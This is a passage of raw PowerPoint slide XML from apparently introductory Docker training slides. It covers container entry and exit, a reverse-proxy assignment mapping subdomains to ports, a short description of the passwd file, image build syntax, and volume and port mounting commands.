            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-422910" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3060"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go inside the container</a:t>
            </a:r>
            <a:endParaRPr sz="3060">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-422910" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3060"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exit from Container</a:t>
            </a:r>
            <a:endParaRPr sz="3060">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4399"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4400" name="Google Shape;4400;p71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Docker Assignment with Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4401" name="Google Shape;4401;p713"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1236875"/>
            <a:ext cx="8520600" cy="3332100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://app1.domain.com -&gt; Ip:8080 -&gt; It work from 8080</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://app2.domain.com -&gt; Ip:8081 -&gt; It work from 8081</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://app3.domain.com -&gt; Ip:8082 -&gt; It work from 8082</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://app4.domain.com -&gt; Ip:8083 -&gt; It work from 8083</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://jenkins.domain.com-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; ip:8080 -&gt; JenkinsLanding</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84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93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="2597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 sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> file contains information about the users, ,their login name, user and group IDs, home directory and other information</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2164275" y="262025"/>
            <a:ext cx="5236500" cy="74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PASSWD</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4405"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4406" name="Google Shape;4406;p714"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204225" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4410"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4411" name="Google Shape;4411;p71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How to build image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4412" name="Google Shape;4412;p715"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1236875"/>
            <a:ext cx="8520600" cy="33321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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image build -t account/image:tag location</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	docker image build -t vishalmahawar5200/image1:tag1 .</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4416"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4417" name="Google Shape;4417;p716"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229050" y="2314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How to do volume mounting ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4418" name="Google Shape;4418;p716"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229050" y="804175"/>
            <a:ext cx="8685900" cy="316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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create  -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv:cv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp:cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account/imageName:tagName</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker container create -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp:cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv:cv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>account/imageName:tagName</a:t>
            </a:r>
            <a:endParaRPr sz="2075">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1775">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create -p hp:cp -v .:/var/www/html vishalmahawar5200/image1:tag1</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4419" name="Google Shape;4419;p716"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273650" y="3669350"/>
            <a:ext cx="8520600" cy="12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hp = Host Port</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cp = Container Port</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv = Host Volume</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cv = Container Volume</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4423"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4424" name="Google Shape;4424;p717"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229050" y="2314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How to do volume mounting ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4425" name="Google Shape;4425;p717"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229050" y="804175"/>
            <a:ext cx="8685900" cy="316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100">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d  -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv:cv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p </a:t>
